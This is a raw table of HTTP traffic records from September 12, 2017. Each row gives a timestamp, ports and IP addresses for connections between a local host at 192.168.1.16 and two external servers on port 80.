Sep 12, 2017 22:18:56.367208958 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.367229939 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.369544983 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.369580030 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.446208000 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.446249008 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.446417093 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.446439028 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.447654963 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.447693110 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.447797060 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.447812080 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.447873116 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.447895050 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.447921038 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.447942972 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.447957039 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.452507973 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.453783035 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.453876972 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.468549013 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.486208916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.486238956 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.486258030 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.486458063 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.493012905 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.493205070 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.526783943 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.526809931 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.526820898 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.527067900 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.533483028 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.533508062 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.533516884 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.533685923 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.552510977 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.552529097 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.552537918 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.552553892 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.552719116 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.560271025 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.560286999 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.560535908 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.560570955 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.623899937 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.623936892 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.624084949 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.624125957 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.637536049 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.637563944 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.637612104 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.637631893 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.640618086 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.640645027 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.640661955 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.640726089 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.640746117 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.640819073 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.640836954 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.640938044 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.640954971 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.641227007 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.677334070 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.677553892 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.743649006 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.743685961 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.743699074 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.743908882 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.745018959 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.745043039 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.745053053 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.745167017 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.781625986 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.781666994 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.781680107 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.782056093 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.783941031 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.783974886 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.783983946 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.784260988 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.784384012 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.821639061 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.821665049 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.822010994 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.822124958 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.824237108 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.824253082 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.824518919 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.824640989 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.861428022 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.861464977 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.861498117 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.862027884 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.862204075 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.862258911 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.864394903 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.864419937 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.864454985 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.864706039 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.888533115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.888827085 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.893847942 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.893878937 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.893896103 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.894093990 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.927772999 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.927793026 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.927798986 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.928145885 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.933643103 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.933691025 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.933710098 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.934022903 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.944268942 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.944313049 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.944333076 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.944628954 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.944720030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.983875036 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.983979940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.984529972 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.984553099 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.985129118 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.006217003 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.006253004 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.006262064 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.006500959 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.022583961 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.022622108 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.022644043 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.022675037 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.022969007 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.023021936 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.024127960 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.024167061 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.024183035 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.024282932 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.045180082 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.045595884 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.063123941 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.063162088 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.063174963 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.063297987 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.064033031 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.085279942 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.085314035 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.085333109 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.085683107 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.102675915 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.102705956 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.102719069 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.102878094 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.103460073 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.103488922 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.103504896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.103945971 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.125138044 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.125261068 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.143618107 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.143652916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.143668890 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.144196033 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.166080952 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.166111946 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.166141987 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.168658018 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.168703079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.168732882 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.168778896 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.168812037 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.169049025 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.169070005 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.169599056 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.169639111 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.169658899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.214510918 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.214553118 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.214804888 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.214838028 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.246051073 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.246088982 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.246270895 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.246303082 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.256356001 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.256395102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.256414890 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.256561995 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.256581068 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.256793022 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.256825924 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.256865978 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.256882906 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.257391930 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.285361052 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.285676956 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.311285019 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.311312914 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.311321020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.311500072 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.349587917 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.349626064 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.349634886 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.349884033 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.368757010 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.368791103 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.368804932 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.369110107 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.372255087 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.372279882 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.372292042 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.372509956 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.372565031 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.399245977 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.399281979 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.399486065 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.399518967 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.437335014 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.437376022 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.437556028 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.437589884 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.444839001 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.444876909 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.444901943 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.445139885 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.445166111 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.445189953 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.445221901 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.445260048 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.445277929 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.445703030 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.477648020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.477979898 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.479912043 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.479947090 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.479960918 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.480164051 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.517724037 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.517760038 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.517772913 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.517952919 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.519807100 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.519831896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.519845009 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.519932985 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.520055056 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.520072937 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.520093918 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.520541906 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.520570040 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.557840109 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.557866096 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.557977915 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.558002949 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.561323881 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.561341047 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.561563015 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.561592102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.583081007 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.583117008 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.583132982 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.583607912 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.583642006 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.583671093 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.597459078 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.597472906 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.597480059 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.597611904 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.622765064 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.622956991 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.624007940 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.624032974 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.624042034 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.624135971 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.637307882 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.637337923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.637347937 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.637521029 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.664083958 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.664113998 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.664123058 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.664269924 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.677767038 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.677795887 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.677804947 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.677891016 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.677921057 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.719433069 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.719470024 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.719595909 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.719623089 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.757379055 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.757421017 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.757594109 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.757627964 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.759743929 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.759772062 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.759789944 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.759922981 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.759949923 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.759980917 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.760282993 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.760303020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.760313034 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.760406971 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.797559977 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.797760963 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.800508976 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.800533056 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.800545931 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.800672054 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.837354898 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.837403059 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.837412119 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.837640047 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.839715958 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.839749098 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.839766026 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.839907885 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.840679884 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.840717077 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.840725899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.840845108 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.840872049 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.877583981 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.877608061 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.877902031 MESZ	49199	80	192.168.1.16	91.219.236.207
